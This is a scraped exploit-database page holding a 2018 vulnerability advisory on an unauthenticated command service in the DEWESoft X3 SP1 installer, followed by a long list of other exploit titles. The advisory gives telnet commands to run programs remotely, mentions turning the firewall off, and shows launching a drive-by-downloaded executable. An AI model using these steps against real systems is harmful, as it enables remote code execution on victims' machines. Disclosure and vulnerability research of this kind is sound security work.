Exploit Database

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt
[+] ISR: Apparition Security 
DEWESoft X3 SP1 (64-bit) installer - X3
Vulnerability Type:
Remote Internal Command Access
CVE Reference:
Security Issue:
The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component does not require authentication
for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a
RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or Run 
a "SETFIREWALL Off" command. 
The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after installing using the full-install.
Internal commands used by "RunExeFile.exe" for which I could not find any documentation.
TELNET x.x.x.x 1999 
RUN calc.exe
Launch the victims browser and send them to website for a drive-by download etc.
TELNET x.x.x.x 1999 
Then from the TELNET session execute it from Downloads directory.
runexe c:\Users\victim\Downloads\DOOM.exe
Network Access:
Disclosure Timeline:
Vendor Notification: February 9, 2018
Vendor "thank you for the warning. We will forward this to the developers and they will look into it" : February 19, 2018
Inform vendor of disclosure timeline : February 19, 2018
No further replys, update or addressing of the issue by vendor.
Vendor "We will assume that this issue is resolved and close the ticket." : March 6, 2018
March 10, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

44326Android Bluetooth - BNEP bnep_data_ind() Remote Heap DisclosuredosuarksLa2018/03/23
44327Android Bluetooth - BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds ReaddosuarksLa2018/03/23
44328Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 - 170109) - Access Control Bypasswebappsatamorphosi2018/03/23
44330Allok Quicktime to AVI MPEG DVD Converter 4.6.1217 - Stack-Based Buffer OverflowlocalMohan Ravichandran and Velayutham Selvaraj2018/03/23
44331Crashmail 1.6 - Stack-Based Buffer Overflow ( ROP execve )localJuan Sacco2018/03/23
44332Dell EMC NetWorker - Denial of ServicedosMarek Cybul2018/03/23
44333WM Recorder 16.8.1 - Denial of Servicedoszy2018/03/23
44335TL-WR720N 150Mbps Wireless N Router - Cross-Site Request ForgerywebappsMans van Someren2018/03/23
44336XenForo 2 - CSS Loader Denial of ServicewebappsockedByt2018/03/23
44337Easy CD DVD Copy 1.3.24 - Local Buffer Overflow (SEH)localHashim Jawad2018/03/23
44338Easy Avi Divx Xvid to DVD Burner 2.9.11 - '.avi' Denial of ServicedosHashim Jawad2018/03/23
44339MyBB Plugin Last User's Threads in Profile Plugin 1.2 - Persistent Cross-Site ScriptingwebappsxB2018/03/23
44340Wordpress Plugin Site Editor 1.1.1 - Local File InclusionwebappsNicolas Buzy-Debat2018/03/23
44325Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address LeaklocalGregory Draperi2018/03/22
44307Google Software Updater macOS - Unsafe use of Distributed Objects Privilege EscalationlocalGoogle Security Research2018/03/20
44308Microsoft Windows Kernel - 'NtQueryVirtualMemory(MemoryMappedFilenameInformation)' 64-bit Pool Memory DisclosuredosGoogle Security Research2018/03/20
44309Microsoft Windows Kernel - 'NtQueryInformationThread(ThreadBasicInformation)' 64-bit Stack Memory DisclosuredosGoogle Security Research2018/03/20
44310Microsoft Windows Kernel - 'nt!KiDispatchException' 64-bit Stack Memory DisclosuredosGoogle Security Research2018/03/20
44311Microsoft Windows Kernel - 'nt!NtWaitForDebugEvent' 64-bit Stack Memory DisclosuredosGoogle Security Research2018/03/20
44312Internet Explorer - 'RegExp.lastMatch' Memory DisclosuredosGoogle Security Research2018/03/20
44313Microsoft Windows - Desktop Bridge VFS Privilege EscalationlocalGoogle Security Research2018/03/20
44314Microsoft Windows - Desktop Bridge Virtual Registry Arbitrary File Read/Write Privilege EscalationlocalGoogle Security Research2018/03/20
44315Microsoft Windows - Desktop Bridge Virtual Registry NtLoadKey Arbitrary File Read/Write Privilege EscalationlocalGoogle Security Research2018/03/20
44316Kamailio 5.1.1 / 5.1.0 / 5.0.0 - Off-by-One Heap OverflowdosnableSecurit2018/03/20
44317Intelbras Telefone IP TIP200 LITE - Local File Disclosurewebappsnhax02018/03/20
44318Vehicle Sales Management System - Multiple Vulnerabilitieswebappsin2018/03/20
44324Cisco node-jos < 0.11.0 - Re-sign TokenswebappsioBlac2018/03/20
44299Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege EscalationlocalVitaly Nikolenko2018/03/19
44300Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege EscalationlocalVitaly Nikolenko2018/03/19
44293Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Executionremoteh2018/03/16
44294Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Executionremoteh2018/03/16
44295Contec Smart Home 4.15 - Unauthorized Password Resetwebapps3ro0n2018/03/16
44298Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege EscalationlocalBruce Leidl2018/03/16
44288WordPress Plugin Duplicator 1.2.32 - Cross-Site ScriptingwebappsStefan Broeder2018/03/15
44289Spring Data REST < 2.6.9 (Ingalls SR9)_ 3.0.1 (Kay SR1) - PATCH Request Remote Code ExecutionwebappsAntonio Francesco Sardella2018/03/15
44290MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer OverflowremoteoreLab2018/03/15
44291Android DRM Services - Buffer OverflowdosTamir Zahavi-Brunner2018/03/15
44292SAP NetWeaver AS JAVA CRM - Log injection Remote Command Executionremoteerp scan team2018/03/14
44285SecurEnvoy SecurMail 9.1.501 - Multiple VulnerabilitieswebappsSEC Consult2018/03/13
44286Tuleap - Blind SQL InjectionwebappsCristiano Maruti2018/03/13
44274ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit)webappsMehmet Ince2018/03/12
44275DEWESoft X3 SP1 (64-bit) - Remote Command Executionremoteyp3rlin2018/03/12
44276Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded CredentialswebappsiquidWor2018/03/12
44277TextPattern 4.6.2 - 'qty' SQL InjectionwebappsManuel García Cárdenas2018/03/12
44278Advantech WebAccess < 8.3 - Directory Traversal / Remote Code ExecutionwebappsChris Lyne2018/03/12
44279SC 7.16 - Stack-Based Buffer OverflowlocalJuan Sacco2018/03/12
44280Eclipse Equinoxe OSGi Console - Command Execution (Metasploit)remoteetasploi2018/03/12
44281ACL Analytics 11.X - - Arbitrary Code Executionwebappslutchisback2018/03/12
44283MikroTik RouterOS < 6.38.4 (MIPSBE) - 'Chimay Red' Stack Clash Remote Code ExecutionremoteLorenzo Santina2018/03/12
44284MikroTik RouterOS < 6.38.4 (x86) - 'Chimay Red' Stack Clash Remote Code ExecutionremoteLorenzo Santina2018/03/12
44282Sony Playstation 4 (PS4) 4.55 < 5.50 - WebKit Code Execution (PoC)localwertyoruio2018/03/10
44270WebLog Expert Enterprise 9.4 - Authentication Bypasslocalyp3rlin2018/03/09
44271WebLog Expert Enterprise 9.4 - Denial of Servicedosyp3rlin2018/03/09
44272Bacula-Web < 8.0.0-rc2 - SQL InjectionwebappsGustavo Sorondo2018/03/09
44265Memcached 1.5.5 - 'Memcrashed ' Insufficient Control of Network Message Volume Denial of Service With Shodan APIdos42018/03/08
44261Redaxo CMS Addon MyEvents 2.2.1 - SQL Injectionwebapps0n1gsp3ch2018/03/07
44262antMan 0.9.0c - Authentication BypasswebappsJoshua Bowser2018/03/07
44255Softros Network Time System Server 2.3.4 - Denial of Servicedosyp3rlin2018/03/06
44256Bravo Tejari Web Portal - Cross-Site Request ForgerywebappsArvind V2018/03/06
44257Chrome V8 JIT - Simplified-lowererer IrOpcode::kStoreField_ IrOpcode::kStoreElement Optimization BugdosGoogle Security Research2018/03/06
44258Chrome V8 JIT - JSBuiltinReducer::ReduceObjectCreate Fails to Ensure that the Prototype is _null_dosGoogle Security Research2018/03/06
44259Chrome V8 JIT - 'GetSpecializationContext' Type ConfusiondosGoogle Security Research2018/03/06
44260Chrome V8 JIT - Empty BytecodeJumpTable Out-of-Bounds ReaddosGoogle Security Research2018/03/06
44243Xion 1.0.125 - '.m3u' Local SEH-Based Unicode Venetian Exploitlocalyntheti2018/03/05
44244Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflowlocalzy2018/03/05
44245NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)remoteetasploi2018/03/05
44246Sophos UTM 9.410 - 'loginuser' 'confd' Service Privilege EscalationlocaloreLogi2018/03/05
44247Suricata < 4.0.4 - IDS Detection BypassdosPositive Technologies2018/03/05
44250ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL InjectionwebappsSEC Consult2018/03/05
44251ActivePDF Toolkit < - Multiple Memory CorruptionsdosFrançois Goichon2018/03/05
44254Memcached - 'memcrashed' Denial of ServicedosAlex Conrey2018/03/05
44264Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (1)dosnonymou2018/03/05
44217IrfanView 4.44 Email Plugin - Buffer Overflow (SEH)localzy2018/03/02
44218IrfanView 4.50 Email Plugin - Buffer Overflow (SEH Unicode)localzy2018/03/02
44219D-Link DIR-600M Wireless - Cross-Site ScriptingwebappsPrasenjit Kanti Paul2018/03/02
44220antMan < 0.9.1a - Authentication BypasswebappsJoshua Bowser2018/03/02
44221SEGGER embOS/IP FTP Server 3.22 - Denial of Servicedosyp3rlin2018/03/02
44222DualDesk 20 - 'Proxy.exe' Denial of Servicedosyp3rlin2018/03/02
44223uWSGI < 2.0.17 - Directory TraversalwebappsMarios Nicolaides2018/03/02
44224iSumsoft ZIP Password Refixer 3.1.1 - Buffer OverflowlocalcrR1pTK1dd12018/03/02
44226TestLink Open Source Test Management < 1.9.16 - Remote Code ExecutionremoteManish Tanwar2018/03/02
44215Apple iOS 11.2.5 / watchOS 4.2.2 / tvOS 11.2.5 - 'bluetoothd' Memory CorruptiondosZimperium zLabs Team2018/02/28
44216Routers2 2.24 - Cross-Site ScriptingwebappsLorenzo Di Fuccia2018/02/28
44178Transmission - Integer Overflows Parsing Torrent FilesdosGoogle Security Research2018/02/27
44179Chrome V8 - 'PropertyArray' Integer OverflowdosGoogle Security Research2018/02/27
44180Chrome V8 - 'TranslatedState::MaterializeCapturedObjectAt' Type ConfusiondosGoogle Security Research2018/02/27
44181Asterisk chan_pjsip 15.2.0 - 'INVITE' Denial of ServicedosnableSecurit2018/02/27
44182Asterisk chan_pjsip 15.2.0 - 'SDP' Denial of ServicedosnableSecurit2018/02/27
44183Asterisk chan_pjsip 15.2.0 - 'SDP fmtp' Denial of ServicedosnableSecurit2018/02/27
44184Asterisk chan_pjsip 15.2.0 - 'SUBSCRIBE' Stack CorruptiondosnableSecurit2018/02/27
44185Schools Alert Management Script 2.0.2 - Authentication BypasswebappsPrasenjit Kanti Paul2018/02/27
44186MyBB My Arcade Plugin 1.3 - Cross-Site ScriptingwebappsxB2018/02/27
44187GetGo Download Manager - Buffer Overflow (SEH)remotezy2018/02/27
44188Joomla! Component K2 2.8.0 - Arbitrary File DownloadwebappsIhsan Sencan2018/02/27
44189Microsoft Windows Windows 8.1/2012 R2 - SMB Denial of ServicedosNabeel Ahmed2018/02/27
44191School Management Script 3.0.4 - Authentication BypasswebappsSamiran Santra2018/02/27
44192CMS Made Simple 2.1.6 - Remote Code ExecutionwebappsKeerati T.2018/02/27
44194Concrete5 < 8.3.0 - Username / Comments EnumerationwebappsChapman Schleiss2018/02/27
44196Sony Playstation 4 (PS4) 4.55 - Jailbreak (WebKit 5.01 / 'bpf' Kernel Loader 4.55)remotepecte2018/02/27
44197Sony Playstation 4 (PS4) 5.01 < 5.05 - WebKit Code Execution (PoC)dosLEXZZZ2018/02/27

All rights reserved nPulse.net 2009 - 2018
Powered by: MVCP / ASPF / PHP 7.2 / NGINX / FreeBSD